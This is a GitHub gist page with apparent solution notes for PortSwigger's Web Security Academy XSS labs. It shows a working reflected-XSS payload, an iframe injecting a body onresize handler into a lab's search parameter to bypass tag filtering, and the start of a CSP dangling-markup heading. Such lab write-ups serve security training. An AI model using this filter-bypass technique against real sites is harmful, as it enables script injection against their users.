Skip to content

Instantly share code, notes, and snippets.

View barttran2k's full-sized avatar
🏠
Working from home

Trần Bách barttran2k

🏠
Working from home
15 followers · 7 following
View GitHub Profile
@ChrisPritchard
ChrisPritchard / advanced-xss-labs-solutions.md
Last active September 19, 2023 01:54
Solution sketchbook for Portswigger's new XSS labs (the new-new ones).

Reflected XSS into HTML context with most tags and attributes blocked

Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):

<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E"  width=300 id="frame" onload="this.width = 500"></iframe>

Reflected XSS protected by CSP, with dangling markup attack